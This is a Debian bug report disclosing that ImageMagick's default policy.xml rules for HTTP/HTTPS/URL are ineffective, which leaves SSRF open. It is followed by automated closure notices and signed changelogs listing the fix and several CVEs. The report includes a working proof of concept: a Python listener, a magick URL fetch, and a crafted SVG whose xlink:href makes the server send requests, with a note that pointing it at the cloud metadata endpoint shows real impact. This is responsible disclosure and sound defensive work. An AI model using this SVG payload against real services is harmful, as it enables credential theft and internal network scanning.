#1140176 imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918) #1140176
- Package:
- imagemagick
- Source:
- imagemagick
- Description:
- image manipulation programs -- binaries
- Submitter:
- Maram Sai Harsha Vardhan Reddy
- Date:
- 2026-06-24 21:05:04 UTC
- Severity:
- normal
- Tags:
Dear Maintainer,
The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:
<policy domain="delegate" rights="none" pattern="URL" />
<policy domain="delegate" rights="none" pattern="HTTPS" />
<policy domain="delegate" rights="none" pattern="HTTP" />
These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).
Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.
The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.
Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.
1. Minimal listener:
python3 -c 'import http.server,socketserver
class H(http.server.BaseHTTPRequestHandler):
def do_GET(s): print("SSRF:",s.path); s.send_response(200);
s.end_headers(); s.wfile.write(b"GIF89a;")
def log_message(s,*a): pass
socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'
2. Confirm the restrictive policy is active (this is correctly blocked):
echo x > /tmp/q.txt
magick label:@/tmp/q.txt /tmp/q.png
-> magick: attempt to perform an operation not allowed by the
security policy `@/tmp/q.txt'
3. PoC 1 -- direct URL coder:
magick http://127.0.0.1:7777/ssrf out.png
-> listener logs: SSRF: /ssrf
4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):
printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink" width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf" width="10"
height="10"/></svg>' > evil.svg
magick evil.svg out.png
-> listener logs: SSRF: /svg-ssrf
Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.
Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.
Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:
<policy domain="coder" rights="none"
pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
(keeping the existing @* path rule). Verify with:
magick http://127.0.0.1:1/x x.png
which must be rejected by policy, not merely fail to connect.
Bastien Rouccaries has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.
Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.
Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
maramsaiharsha24@gmail.com
We believe that the bug you reported is fixed in the latest version of imagemagick, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1140176@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@ftp-master.debian.org) Format: 1.8 Date: Tue, 16 Jun 2026 22:22:44 +0200 Source: imagemagick Architecture: source Version: 8:7.1.2.25+dfsg1-2 Distribution: unstable Urgency: medium Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org> Changed-By: Bastien Roucariès <rouca@debian.org> Closes: 1140176 Changes: imagemagick (8:7.1.2.25+dfsg1-2) unstable; urgency=medium . * Fix default ImageMagick policy configuration (Closes: #1140176) Checksums-Sha1: f4f69a8df84d0b55426bc532db2e012723750f7a 5129 imagemagick_7.1.2.25+dfsg1-2.dsc ee66b21d708c7fb61d0f6aab145ad46ecc88299f 10539840 imagemagick_7.1.2.25+dfsg1.orig.tar.xz 856f34f5e28b58b207df2d4551a181ee8e97e9f0 269108 imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz 06f120f1fe629824520eb8c4ecce315eb28cb454 8501 imagemagick_7.1.2.25+dfsg1-2_source.buildinfo Checksums-Sha256: 0bf4b4419374afb4b80e4ba2422a3e36a69438c9651c97dbab8e8acc3b60b888 5129 imagemagick_7.1.2.25+dfsg1-2.dsc f978ff8fc6fe47e70a66f8cc748d8aa6dab81fa97f14ac47ee5a464f22d68212 10539840 imagemagick_7.1.2.25+dfsg1.orig.tar.xz 853c293b63200e01c525404143c52fe07856c3ed9f3fde4de6d6d057620844f3 269108 imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz 2608125f89fc2fcf82164965ce7c3dc88f97579341e93eca450ded033b0cd5ec 8501 imagemagick_7.1.2.25+dfsg1-2_source.buildinfo Files: c04d2e4fd260cae67a62a4034f1793b6 5129 graphics optional imagemagick_7.1.2.25+dfsg1-2.dsc c870e0367efccd3649e52a78a168257a 10539840 graphics optional imagemagick_7.1.2.25+dfsg1.orig.tar.xz a164d5c0146905889d54bdd88ef5130c 269108 graphics optional imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz e5e9d964f8bc7d602e15a9f151977acb 8501 graphics optional imagemagick_7.1.2.25+dfsg1-2_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmoxx9EACgkQADoaLapB CF+GlhAAsn8iHRgLpRacAGT3GarNadZz73Hz068/MI29Ory1LSTbjDrVK8l+fg7a VxOsJGwML5LrwBpWni6cppV57uKXhs+0JBhOez1ggfYsut9rG4U7VXuuNy+xLibc eSEL4DI/inOFy1tQX3aDrFuun0Rz8/5+ucDx/R3oY4qSxSchwobQLN3ZQPcHb6WU gJrA5T5BDQLfNnETNVDcu4Ew+F7QvCzVscoC4DvgNliYzBz4x+nblHPS/ysLJ8// vwkRWWn7kET48oxquB6AFwJsiRF9atfkBBbZbFoFZaaiJmDA02vOYUprJA0TXxNz DtJMlDUgtzTPhHCK4ejs8RXlrgaQtOaLu30g8cJHdt2uXH/xxMxvYkJkk7TQNF9O 2Xmhxbiqlr3kndlnAU92SodEueZortiZpT7JgUsDTh+eh9+a2CPVZCPgU2+Lcibi 3hI8Kpa8q/gpzJVMJvHiGQHs4XpnqDlSjFecw90A8ySQdqRhYTsERXpXlkFBPX+L 1lCR8atzwss4S7ZGs59PGOzLbMyukH9F95PPGzC6fw9VTd3TwzQWG71DrI3Lu4AY Wjn2KyXpmV+r2SELGvk7vPKvyrusVPlpe/iwhw3NgBGhN7GL1rEVLJeqRrgGmniA SkXW/3Ug8bhymthvRV4C3YDUMcqYZloTs7zxUUWQbyR34tUtJGA= =y2oh -----END PGP SIGNATURE-----
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1140176@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Sat, 20 Jun 2026 13:35:39 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.1.43+dfsg1-1+deb13u10
Distribution: trixie-security
Urgency: high
Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Closes: 1140176
Changes:
imagemagick (8:7.1.1.43+dfsg1-1+deb13u10) trixie-security; urgency=high
.
* Fix CVE-2026-48724:
When using an image with mask the Floyd-Steinberg dithering
method it will cause a negative heap buffer over-write
* Fix CVE-2026-48734:
A crafted MVG file could result in a stack overflow due to a missing depth
or visited-set check
* Fix CVE-2026-48994:
A missing check of a return value could lead to a heap buffer over-write in the MAT
decoder on 32-bit systems.
* Fix CVE-2026-49218:
A missing check in the DCM decoder could result in an image with invalid dimensions
and that could cause crashes in other operation.
* Fix CVE-2026-49219:
An incorrect parsing of the filename can result in a policy bypass and read files
disallowed by a security policy using a symlink
* Backport policy from 7.1.2.25
* Fix CVE-2026-53460:
A missing check for maximum memory request in AcquireAlignedMemory
could trigger an out-of-Memory condition.
* Fix CVE-2026-53461:
An incorrect loop in the ICON decoder can result in an out of
bounds heap write resulting in a crash.
* Fix CVE-2026-53463:
When passing incorrect arguments in the distort operation a
null pointer deference will occur.
* Fix CVE-2026-53464:
When providing invalid options to the wand option parser
a small memory leak will occur.
* Harden debian policy in case of custom recompilation (Closes: #1140176)
Checksums-Sha1:
623835326a9e19622ced44bd8b93caf9470fde17 5165 imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
103af0af388a733c043845b228cf3031c16d859b 10501740 imagemagick_7.1.1.43+dfsg1.orig.tar.xz
f0272bcbc3f31e0312f9d104a6d4ecf555485515 346928 imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
dbb9b98836b3b438e7ccd2cbd5d34e0ec5b04cb8 8537 imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Checksums-Sha256:
a3b34ba2a422e93a219195a499ee67b306561f91683d7a77800d83157ed7f10d 5165 imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
bcb4f3c78a930a608fa4889f889edbcb384974246ad9407fce1858f2c0607bfe 10501740 imagemagick_7.1.1.43+dfsg1.orig.tar.xz
8aee9cfdf22414d306fa1b027670f7a4ececc359164e92868b150f21e099d621 346928 imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
f08aa361a89b882d1222aa920d45d1bf124ea073825c941c5f5e1c4786021021 8537 imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
Files:
fae1fc22e7e0345b6e7017c9d00b0101 5165 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10.dsc
01cfb13a7c1813afb50790e431358c6c 10501740 graphics optional imagemagick_7.1.1.43+dfsg1.orig.tar.xz
59618f1ae2ed16055eb4d998dc3b7590 346928 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10.debian.tar.xz
3a439d3a552ce5cf68d54a3a98296237 8537 graphics optional imagemagick_7.1.1.43+dfsg1-1+deb13u10_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmo3ku8ACgkQADoaLapB
CF9DWQ//UGqtD+gMuatUKmYJXO9gh3He9gef/enbzNWUnCssn0AMkBjVL2wmw9E0
hUa2AIiWicl8qfDxGZiJzI2JiG5uIlX1pwqrXEUMfMXWXbom0ORVq4WN9cVcge2A
ebvVz7pEiD9oeL56Ff6khV6ha9d/Ig0q/mUq8BNwd19I8Gxz517h6eoe0N434e8j
R1SW244+T1FZLiIsxROHL/bfaX2a/ugwT/SNp3yk0d73vSmANtWYoNFASQbMaxHT
NCieZQxF5RueEpCDD08OSAMOhVf496PjLn644JaAduGcoSbIQW3Tslu53xiNAJt5
l6dHvDZ+JTPmER2tbnb8wygE4VDkwsjP0d+/5Wv3oJ7L5n91Eh8rEFPyq+RgDcGh
DTZb/FZPlovtqVq5/uMGdXkyHosgAEefeJeNp5Pi9c0sSM/P1O8QnPsv0fe/sIIB
FHyWdkRjqxTaI0weJ9LzJdEQefg8wbmisqLIdRRCB584IiKajoQOloOmRLzt5/oM
Tod/zO644H9upgbHl+jwsOo61nqKDvrHRAMWxDRwwWIFHORXO+SWpxSDsdI9OJnY
cGGHY/MB7QbuzfWDZqvsh0EXI6HR6wT1RAVo6T3qj497bOA17Hh+QeZPNswgDcGc
G92tnKoA+OxlSItofoefEXPIe3Toj27laCviBDH1TeZcMxyQhN8=
=nqf8
-----END PGP SIGNATURE-----
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1140176@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <rouca@debian.org> (supplier of updated imagemagick package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Sun, 21 Jun 2026 15:40:05 +0200
Source: imagemagick
Architecture: source
Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Distribution: bookworm-security
Urgency: high
Maintainer: ImageMagick Packaging Team <pkg-gmagick-im-team@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <rouca@debian.org>
Closes: 1140176
Changes:
imagemagick (8:6.9.11.60+dfsg-1.6+deb12u11) bookworm-security; urgency=high
.
* Fix CVE-2026-48733:
An infinite loop in the subimage-search operation can happen
when using a crafted image.
* Fix CVE-2026-48734:
A crafted MVG file could result in a stack overflow due to a missing depth
or visited-set check
* Fix CVE-2026-48994:
A missing check of a return value could lead to a heap buffer over-write in the MAT
decoder on 32-bit systems.
* Fix CVE-2026-49218:
A missing check in the DCM decoder could result in an image with invalid dimensions
and that could cause crashes in other operation.
* Fix CVE-2026-53460:
A missing check for maximum memory request in AcquireAlignedMemory
could trigger an out-of-Memory condition.
* Fix CVE-2026-53463:
When passing incorrect arguments in the distort operation a
null pointer deference will occur.
* Fix default policy.xml HTTP/HTTPS/URL delegate rules are no-ops
(Closes: #1140176)
Checksums-Sha1:
c3f16669cff11f4e0b18a0d86d3bfd20477243b3 5134 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
824a63dce5e54bd8b78077d671d8ab06300a8848 9395144 imagemagick_6.9.11.60+dfsg.orig.tar.xz
3886314169eaaacb6cccab42640a3d03688f480d 337148 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
752aa4d804c3efbab1be821483cf05cda548765c 8516 imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Checksums-Sha256:
bc7cfc2484b72d4791be7785a0a251c8d55508975f70d794bd14cee73d06caef 5134 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
472fb516df842ee9c819ed80099c188463b9e961303511c36ae24d0eaa8959c4 9395144 imagemagick_6.9.11.60+dfsg.orig.tar.xz
7782105ca00f7a22dbc353b37b5da89414379545defce3986e0e1726631afd82 337148 imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
b37363b9b3877324003befe138e26b3bddc09c2fb41e4e0969893504b0d72142 8516 imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Files:
399311662b1e0251a24ec17ff9df279c 5134 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
8b8f7b82bd1299cf30aa3c488c46a3cd 9395144 graphics optional imagemagick_6.9.11.60+dfsg.orig.tar.xz
d36a95688c1ef54ade52609eafa870bb 337148 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
a3d8eeeab7895c18dcef5af365f63dc7 8516 graphics optional imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmo4HSsACgkQADoaLapB
CF+hSg/9FnxizYDr9PiDXedH+rSFGR0AgfK6JzbpmJtenlu0lGvBAqPp2OVXtMlw
4c9JYhkLXcaN9o7dbHaTRYnq6dFrlUUH6RA13oLasVG+vwG0joiCJosyPMk9TNlh
1IGU5lNNxht45+8skahfa8NBF/yhvsbJBIyoKGsf/XJRCaOfMsAlVlkbbnpjNNSX
pwgieYZh+1nQcBCJgYS3RpV5MS7E95f9mvyyU9KU/0lNuCGxGL+y9CbLfyVl6+K3
tg8lHw+lBruwB+s6h2s2XNxwjCJ8kRQdE0Vk2yuFkHx1UeBXCOa9cb9m4M1a8NJY
j6EaxAc2BemWK3HY8DbzpgvrAdRSlWZN0Ewpi00CmrTZdrYisc3R55WVzoy3y2ur
/gxOw3I/Bi2G6kcjvqGyZTjBiYJvR+4Vbvf+yAOOqIBC3hZspkWdirOsXtSQgrK9
bs2R6Sx0WOh1T0IhCl//8HfHvd9ftIHdiueFN9ombUXi/KBLyyLj6WcUojBk+O+n
FbzMOAMUJspORXx3/gGUhMiX1QfK5GocM9gWdqCnrKNUuqFHPNmxkvKsIIrDOQDm
ZiQsleURPVuAcOVQ3TnR86B8ZyLwgn9rIloNvGsRyacueBcnFbOLZ8KuJcH5ICLs
fmmO44rm/2n9Bb/UqAjBVIHjhCqFDE+h7tyXqGR+LvCC+tDwHWE=
=0a1r
-----END PGP SIGNATURE-----